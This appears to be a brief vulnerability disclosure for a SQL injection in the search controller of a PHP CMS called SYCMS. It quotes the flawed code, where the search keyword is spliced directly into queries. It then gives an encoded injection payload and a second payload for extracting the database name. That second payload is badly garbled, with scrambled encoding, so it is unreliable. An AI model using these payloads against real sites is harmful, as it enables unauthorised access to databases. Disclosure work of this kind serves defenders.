# SYCMS-sql

1. The hole location: / Application/Home/Controller/SearchController class. PHP lines 28

public function index($key='') {
        if(!$key) $this->error('关键词不能为空');
        $this->assign('keywords',$key);
        $count=M('Article')->where('status=1 AND title like \'%'.$key.'%\'')->count();
        $Page =new \Lib\Page($count,6);
        $Page->url='search/key/'.$key;
        $page =$Page->show();
        $this->assign('page',$page);
        $list_search=M('article a')
            ->join('__CATEGORY__ c ON a.cid=c.id')
            ->where('a.status=1 AND a.title like \'%'.$key.'%\'')
            ->field('a.id,a.cid,a.thumb,a.title,a.keywords,a.description,a.add_time,a.view,c.title as cate_title,c.name as cate_name')
            ->limit('0,6')
            ->limit($Page->firstRow.','.$Page->listRows)
            ->order('a.id DESC')
            ->select();
        $this->assign('list_search',$list_search);
        $this->display('index');
    }

This code is the implementation code of the foreground content search function. The function judges the submitted search parameters. When the search value is not empty, the parameters entered by the user are directly splicing into the SQL statement without parameter checking and filtering, resulting in SQL injection.


1. Enter parameters in the search function on the homepage







Clicking Search will take you to search function module



SQL injection payload: %%27%20and%201=1%20and%20%20%27%%27=%27

Get the database name:

20 and 27% % % % 201 = the if (database () % 20 like 20% % 27 shanyucms % 27, 0) % 20 and 20% 20% % 27% % 27 = % 27
 
 
